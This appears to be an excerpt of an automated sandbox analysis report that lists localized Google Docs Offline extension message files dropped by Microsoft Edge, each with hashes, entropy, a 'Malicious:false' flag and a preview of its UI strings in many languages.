                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                    MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                    SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                    SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                    SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):806
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                    MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                    SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                    SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                    SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):883
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                    MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                    SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                    SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                    SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1031
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                    MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                    SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                    SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                    SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1613
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                    MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                    SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                    SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                    SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):848
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                    MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                    SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                    SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                    SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                    MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                    SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                    SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                    SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):961
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                    MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                    SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                    SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                    SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):959
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                    MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                    SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                    SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                    SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):968
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                    MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                    SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                    SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                    SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):838
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                    MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                    SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                    SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                    SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1305
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                    MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                    SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                    SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                    SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):911
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                    MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                    SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                    SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                    SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):939
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                    Encrypted:false
